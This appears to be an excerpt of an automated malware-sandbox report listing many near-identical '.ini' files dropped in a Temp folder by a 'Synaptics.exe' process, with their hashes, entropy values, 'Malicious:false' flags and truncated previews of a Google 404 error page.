                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PJJCMNR6k6BMwg0aHHa_4w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\ZwM2RDr.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.266428341343891
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0WSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                                            MD5:E4F2CE3FEA49A160B703D7F332E8F113
                                                                                                                            SHA1:00B7ECDFF2F8CFF367A01B4B8B5D499A37B143C7
                                                                                                                            SHA-256:3CCC54B0278ED6B2DF8C4BBD1995D91C1E9376C177D89A2AD12AB8E398899A9A
                                                                                                                            SHA-512:72D62C7C0DA4DAC142D95D635FEB05361F01E080A3E6E543D7CB3E7C8FDD91DBE70BABFFA95C58A776CF3C97B3D8FEF7A2C73BE1847BBE12A517BC3303A53D6E
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="trSVtyTV2jMkPLUdpY5MHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\bx4A6bs.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2641660631266305
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0ICISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+lv+pAZewRDK4mW
                                                                                                                            MD5:7B69664E4CB09C054C638394E3BBFF50
                                                                                                                            SHA1:C482809A66869C9CAD2CA714A8B09ECFF8E25A39
                                                                                                                            SHA-256:786BE639C46760C3F081076253D9C3AB799633135B3F76D838A5E93A88FA96B8
                                                                                                                            SHA-512:0E3D7A793A482DF0BB5D6EB9492BE0407E4C37F85828771A6E26A3AD6EB939CDAFCC190131B59660770883AC419638B503A4363F01C0FECC7ABB86A81F04F780
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nYkyh_hHj39wgNuTFyCEfQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\cZlTvH6.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2725015597094105
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0BnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+an+pAZewRDK4mW
                                                                                                                            MD5:809491E492B32AE913BCD9DC0DAD071F
                                                                                                                            SHA1:751C8FC050104B94A86D8F775F78F572E44F161E
                                                                                                                            SHA-256:783FF0D4817C95AC86852DC6431DB6612A38FF3AD4002004DC52FF43CF4C05E9
                                                                                                                            SHA-512:4F218F75C7A646B35849C38F06F3E3ACA4F9990BD47F23D7AB5A3AFF36DE2893674D34BEC9F7DC82E154B70F47353BBD24B004B5E72F5F3D6DB2A1A8B3494160
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="r6kz5S3pipXXezOHKSYFUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\dDqhSTp.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.276238605449316
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0FSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+S+pAZewRDK4mW
                                                                                                                            MD5:7D55EC9C9115DF3DB9C111ED0F6EAF71
                                                                                                                            SHA1:EB0D288E9FFFBC109386E6C705E4BB2CAA753710
                                                                                                                            SHA-256:3872708400098EDFE090CAEFB3E38E0F4DCE894CADB914087F2939B947FD24BA
                                                                                                                            SHA-512:BACDB211323E2765F7D773818A7B4A05616A4E680F97D88A4838E6C33ABC481B7229D4407390AB68FE2C041D89D99615E654DCE1C0C6320AD719DDF27153853A
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tQEM7IJLLQMGy2L477D8FQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\dsTgIo9.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.259890066703935
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0ITSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ZT+pAZewRDK4mW
                                                                                                                            MD5:F604B8681F972D80D13A37EC4D031165
                                                                                                                            SHA1:DC1E995322F5769F1A4FF14AB869C84FDA95EF6F
                                                                                                                            SHA-256:FDF04091EFC0B24212A8FD852DD53F7F96D9B11C83767DDCF6240CA3A8AF2E8E
                                                                                                                            SHA-512:DBFD503A5FC57A5BCC0601CCBC9B04AE1CF09CE59F135C404091318800D1EDFF182AB28BC58B84666E8303A6C986C3A6B0CED5756B4CAD72334FE97B3616A67F
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bTb_WUmAmtypGO8tY0eUZA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\dxEnttN.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.267107644448134
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0isSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+xs+pAZewRDK4mW
                                                                                                                            MD5:686391DBF229A7A87AEF717461B1B738
                                                                                                                            SHA1:7F659709F43B38296260731A6E527BC08401E8EF
                                                                                                                            SHA-256:C8E4A182BAEB8B388759B55D8A4B4AB74A987806BB0CC7A8B65D8BAEBFA32250
                                                                                                                            SHA-512:FA614B66DC60FA699C1130029E97E8238A4E7FD9A9412DD34E193CB7846401374B6243FA2626601406EC09B1E613B6CF27AA3F86119A910CDBADB9828C5AA522
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="R2SqP2UKPAywCZunjSo1mw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\eAvtPUe.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2565382424697065
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0ilSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                                                            MD5:965012A89875E8CAC3622BA473989D3D
                                                                                                                            SHA1:FA6B2C615CE3FDA67DD35BE7B3BBE48FDEE07A89
                                                                                                                            SHA-256:BD1FF80A3A486D8CC8842AEE027ED68CBECBA52E3CB3BE2BC321D7BEC6D01848
                                                                                                                            SHA-512:FD1856690DCD1B867844FCAFBBB98D071778E56E07F77BA265A851028F5F82F4DBE4EEED3AC0FF447C90717B0CB4834D86DA4D155C077ED814F7652C45296CB6
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rjK-RxniF-tcAQ_Bme-HEQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\fEn1d3P.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.267037932490185
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0twpSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+kwp+pAZewRDK4mW
                                                                                                                            MD5:DC85C4FDF2A6306DDB74D0AC5F1B8CEA
                                                                                                                            SHA1:4BB2FB139A5EAD927094BB7E594745AFA53768D0
                                                                                                                            SHA-256:2E2FFC2B7961441641D25155425B8543802CAA80B3C6A79C88332747FA74BB6E
                                                                                                                            SHA-512:C96F9CE548AF973E6E64308F7618333CFF82CE5D7C293A71F08755A3426D8F3BEF7BB012BBD5A5A18B943C4B9AB500CD2F557B9DB33DD7CAC442E666B35B136E
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="J3DnG2OuNAoUkIuLfs6fYg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\gOiVHjP.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.267316826795416
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0Z4dSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a4d+pAZewRDK4mW
                                                                                                                            MD5:25EA0EEB07BCAFBE06BD57BC11314C3F
                                                                                                                            SHA1:E6E2D4BFB607D21916A75BE547A31DA786E5DC2E
                                                                                                                            SHA-256:31893990A6DD9BAEBCA9964644A5F3BAAA5BAF8A3C9EF6E0B3E522B80A4BEF02
                                                                                                                            SHA-512:CC87EE3D80CB256D92C37030FD1D895FD232E853122C1B7E4CA632B7020F4633BF64A9A143C5738A1F1B4DF7CEA48115446EF4CFF1A110DB85253107452705E8
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JN_-nb4jA_NZ0TF1GWfJ5A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\gczgUpM.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.253134582820126
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+03SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                                                            MD5:D1810E98B8CD0A1FE912A3DEECBC55F5
                                                                                                                            SHA1:44DD18225BE0E6CD62855E8CF634D39E83B5DD4D
                                                                                                                            SHA-256:9959E31D813887C0C9FC421F409D6DC686EBCF37A5F5B467FB24BB2954A93934
                                                                                                                            SHA-512:D2192271A2C800582615FEF33409A1EAA1F3A27ECD4C80AFFA26E2B3A4B0D297E1294BEB21E7A8B467DE6694858E7D1B8B6ABAE7C79D0040E8F1030D0B7B5225
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="J7DT_iemYXv70n3lqb-eHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\giPKkmM.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2595896672349
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0KhSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+th+pAZewRDK4mW
                                                                                                                            MD5:598A19BE4A9692E1E921FA7D3A716218
                                                                                                                            SHA1:E3E884AD045694CA43EEC652BC117BDEE8FA50EF
                                                                                                                            SHA-256:8F69CEB90E4C52FB0B8891FB629D8CA6391E2C2671BF925C9080E169FC9090E5
                                                                                                                            SHA-512:DE342CE390311422243AC8A5BA0A3396DCFCD4525017BC335176C96DA8EA3A069BFBE063D48A70567B01B7164705BA0536BC802DFC4564A4D77FDF4618D43B5E
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oGD85fLH5g0z9gh_uz5HVA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\hF8bGZj.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.267317440799556
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+079SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                                                            MD5:39B4E17CF778C76D6A3734596390C74F
                                                                                                                            SHA1:0C1F1828ED8308C69B14E799C61FA8B58840A62F
                                                                                                                            SHA-256:1467891835430753B8305A3E16CD55F6E9EACA902864E0016EA3D55EB557A0E3
                                                                                                                            SHA-512:F2E94FA1906BF2F650A313BFAF7AE45F52E34E9524467AE7EE3D1E0068520ECA9AF1798EFBE5C57E2356838DDCC4D94459D020CD4A8B88FA806DF48D9BB409F1
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tIUeVSUTz7RJ_gejG4FG8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\hIsqLva.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.252532250952589
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0NSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
                                                                                                                            MD5:0136C97577B578569C21D02D1E4D54BE
                                                                                                                            SHA1:E7C311434EBBA6E61AB9B4CDE38B5EA760EF519C
                                                                                                                            SHA-256:199002DC157BEFA7107A889466519E61790DEA85D6853EE215AE0598CBAF8578
                                                                                                                            SHA-512:FB313FEC7FFC414E1233AB88B7AEB92047C9624F6331FF92EEACB0818CE652DF98BB603827C74CC24F1D01785B13872568E850B73009F100FC55BF3EDDF06B88
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uZh4kngsoT0rnqAJ2QB07Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\j8LBLnw.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.260260446975383
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+05SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+m+pAZewRDK4mW
                                                                                                                            MD5:417A003CAF41958FB61F1600ED23DC89
                                                                                                                            SHA1:EF50F9EDE054A593689280552F1F74C1AB121F75
                                                                                                                            SHA-256:D60FCE7299CDBF94443B4E5194A6F5498FC9502F105FEF4DB33B9E5E29823A80
                                                                                                                            SHA-512:588AAA1DF2F7FD8078CFBFFAA295A14B26BB390C17BCB9E36D8E9E8EA260B55E3A5C318B9DC1DD7BAE8637130FCB8FE193B25C584500052BFFB7BEF53CDEF46F
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bHk-ckPnAdN6MYZtiL0kRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\lRPbvek.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
